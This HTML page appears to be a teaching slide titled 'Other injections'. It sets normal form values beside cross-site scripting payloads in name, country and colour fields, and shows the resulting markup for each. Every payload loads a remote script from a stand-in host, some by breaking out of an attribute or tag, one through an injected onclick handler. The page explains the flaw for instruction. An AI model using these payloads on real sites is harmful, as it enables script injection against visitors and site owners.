<html>
    <head></head>
    <body>
        <style>
            body, ul, li { margin:0; padding:0; border:0; }
            body { min-width:820px; }
            .instead-of {
                float:left;
                width: 40%;
            }
            .instead-of strong { color:blue; }
            .center { float:left; width:20%; }
            .inject {
                float:right;
                width:40%;
            }
            .inject strong { color:red; }
            li { height:150px; }
        </style>
        <h1>Other injections</h1>
        <ul>
            <li>
                <div class="instead-of">User name: <input value="Eugene" readonly="readonly" /></div>
                <div class="center">2</div>
                <div class="inject">User name: <input value="&lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;" readonly="readonly" /></div>
                <div></div>
                <div class="instead-of">
                    &lt;html&gt;
                    <br/>...<br/>
                    User name: &lt;span&gt;<strong>Eugene</strong>&lt;/span&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div class="center">2</div>
                <div class="inject">
                    &lt;html&gt;
                    <br/>...<br/>
                    User name: &lt;span&gt;<strong>&lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;</strong>&lt;/span&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div></div>
            </li>
            <li>
                <div class="instead-of">Country: <input value="UK" readonly="readonly" /></div>
                <div class="center">2</div>
                <div class="inject">Country: <input value="
&quot; onclick=&quot;{d=document;s=d.createElement('script');s.setAttribute('src','http://xssfail.com/xss.js');d.body.appendChild(s)}&quot; x=&quot;" readonly="readonly" /></div>
                <div></div>
                <div class="instead-of">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;a href=&quot;http://whocares.com?country=<strong>UK</strong>&quot;&gt;Selected country&lt;/a&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div class="center">2</div>
                <div class="inject">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;a href=&quot;http://whocares.com?country=<strong>&quot;
                    onclick=&quot;{d=document;s=d.createElement('script');s.setAttribute('src','http://xssfail.com/xss.js');d.body.appendChild(s)}&quot;
                    x=&quot;</strong>&quot;&gt;Selected country&lt;/a&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div></div>
            </li>
            <li>
                <div class="instead-of">Country: <input value="UK" readonly="readonly" /></div>
                <div class="center">2</div>
                <div class="inject">Country: <input value="
&quot;&gt;&lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;&lt;a&gt;" readonly="readonly" /></div>
                <div></div>
                <div class="instead-of">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;a href=&quot;http://whocares.com?country=<strong>UK</strong>&quot;&gt;Selected country&lt;/a&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div class="center">2</div>
                <div class="inject">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;a href=&quot;http://whocares.com?country=<strong>&quot;&gt;&lt;/a&gt;
                    &lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;
                    &lt;a href=&quot;</strong>&quot;&gt;&lt;/a&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div></div>
            </li>
            <li>
                <div class="instead-of">Preffered color: <input value="red" readonly="readonly" /></div>
                <div class="center">2</div>
                <div class="inject">Preffered color: <input value="
&quot; /&gt;&lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;&lt;img src=&quot;" readonly="readonly" /></div>
                <div></div>
                <div class="instead-of">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;img src=&quot;http://whocares.com/get-image/color=<strong>red</strong>&quot; /&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div class="center">2</div>
                <div class="inject">
                    &lt;html&gt;
                    <br/>...<br/>
                    &lt;img src=&quot;http://whocares.com/get-image/color=<strong>&quot; /&gt;
                    &lt;script src=&quot;http://xssfail.com/xss.js&quot;&gt;&lt;/script&gt;
                    &lt;img src=&quot;</strong>&quot; /&gt;
                    <br/>...<br/>
                    &lt;/html&gt;
                </div>
                <div></div>
            </li>
        </ul>
    </body>
</html>
